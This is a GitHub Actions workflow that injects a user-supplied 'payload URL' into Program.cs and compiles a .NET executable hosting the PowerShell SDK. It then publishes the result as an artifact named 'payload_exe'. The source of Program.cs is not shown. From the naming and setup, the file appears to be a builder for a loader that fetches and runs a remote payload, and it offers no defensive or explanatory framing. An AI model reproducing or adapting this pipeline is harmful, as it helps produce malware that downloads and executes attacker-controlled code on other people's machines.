name: Build PowerShell EXE with Dynamic URL

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Inject Payload URL into Program.cs
      run: |
        $url = '${{ github.event.inputs.payload_url }}'
        (Get-Content Program.cs) -replace '__PAYLOAD_URL__', $url | Set-Content Program.cs

    - name: Create .NET console project
      run: |
        dotnet new console -o PowerShellRunner
        cp -Force Program.cs PowerShellRunner/
        cd PowerShellRunner
        dotnet add package Microsoft.PowerShell.SDK

    - name: Build EXE
      run: |
        cd PowerShellRunner
        dotnet build -c Release

    - name: Upload Executable
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: PowerShellRunner/bin/Release/**/PowerShellRunner.exe



